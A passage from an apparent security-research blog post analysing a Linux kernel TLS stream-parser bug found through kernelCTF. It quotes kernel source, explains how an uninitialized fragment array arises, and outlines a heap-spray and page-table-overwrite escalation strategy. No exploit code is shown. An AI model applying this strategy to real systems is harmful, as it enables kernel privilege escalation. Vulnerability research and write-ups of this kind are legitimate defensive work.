		skb_fill_page_desc(strp->anchor, shinfo->nr_frags++,
				   page, 0, 0);
	}
    // [ ... ]
}

Let's set a breakpoint in tls_strp_copyin_frag() and inspect the frags array:

The 5 fragments that have been allocated visible above. However, the remaining 12 fragments just have all of their data set to 0.

Now we can understand why this results in a NULL pointer dereference. When skb_copy_bits() attempts to write the data from in_skb to the 6th fragment (which is out-of-bounds, accessed via our PoC that triggers the vulnerability), it will read a NULL netmem pointer and treat it as the page to write to. That's what triggers the NULL pointer dereference.

The question is, can we influence the 6th fragment somehow?

The Big Hint

After spending a couple of hours, I decided to ask about this vulnerability on the kernelCTF discord server. A couple hours after that, lion responded with a really nice hint:

This was a really nice hint. I decided to take a look at exactly how the frags array initialization works.

We know that it's allocated inside the strp->anchor SKB. I found the allocation code in tls_strp_init():

int tls_strp_init(struct tls_strparser *strp, struct sock *sk)
{
	memset(strp, 0, sizeof(*strp));

	strp->sk = sk;

	strp->anchor = alloc_skb(0, GFP_KERNEL);
	if (!strp->anchor)
		return -ENOMEM;

	INIT_WORK(&strp->work, tls_strp_work);

	return 0;
}

I then proceeded to study alloc_skb() really closely. I won't dive too deeply into the code, but it essentially does the following things that are important to us:

Uses kmem_cache_alloc_node() to allocate space for the SKB itself from a specific SKB cache.
Uses kmalloc_reserve() to reserve space for the struct skb_shared_info structure of the SKB. This structure is where the frags array lives.
Uses memset() to zero out the SKB structure up until the tail field.
Uses memset() to zero out the shared info structure up until the dataref field.

The step that's most important to us is step 4. To understand why, let's look at the struct skb_shared_info structure:

struct skb_shared_info {
	// [ ... ]
	atomic_t	dataref;
	
    // [ ... ]

	/* must be last field, see pskb_expand_head() */
	skb_frag_t	frags[MAX_SKB_FRAGS];
};

Evidently, if alloc_skb() only zeroes out up to the dataref field, it leaves the frags array completely uninitialized!

Heap Spraying Primitives

After a lot of reading through the TCP, UDP, and UNIX sockets code, I found that using the splice syscall with tcp_sendmsg_locked() allows me to spray SKBs with 6 fragments in their shared info structure by opening hundreds of sockets. They can then be freed by just closing the sockets.

While playing around with implementing this, I talked to Pumpkin, who also coincidentally started analyzing the vulnerability after seeing my first tweet.

Pumpkin told me that they managed to do the following:

Spray a bunch of SKBs with 6 fragments, and then free them all. This causes the shared info structures to be allocated, as well as the backing pages for each fragment.
Setup a TLS socket. This will cause strp->anchor to be allocated, and the shared info structure should allocate on top of one of the previously sprayed SKB's shared info structures. This means that the frags array will contain a stale pointer in the 6th fragment.
Spray a bunch of pagetables, presumably by calling mmap a whole bunch of times. I haven't done this before so I need to learn how this works. These pagetables should end up on the backing pages that were used for the fragments in step 1.
Trigger the vulnerability.

Once tls_strp_copyin_frag() reaches the 6th fragment (i.e the out-of-bounds fragment), it will attempt to copy the in_skb data to the page pointer of the 6th fragment.

Since this fragment is technically uninitialized data from an older freed SKB, the page pointed to by the stale page pointer actually ends up being one of the pages reclaimed by the pagetables that they sprayed in step 3.

This effectively overwrites pagetable entries with arbitrary data. I'm sure this primitive leads to an easy exploit (I wouldn't know, I've never done this before 😅).

Update: I learned that this primitive is extremely powerful. I wrote a full exploit for the lts-6.12.48 kCTF instance. You can find it here!

The End

And that's it! In this post, I ended up covering the following:

An analysis of the latest kCTF exploit submission (patch commit)
The steps I took to recreate the PoC that triggers the vulnerability
Some thoughts about how to escalate the PoC into a full exploit (and with some help from others, I finally did it!)

If you have any questions about anything in this post, feel free to contact me on Twitter. My DMs are always open.

Table of Contents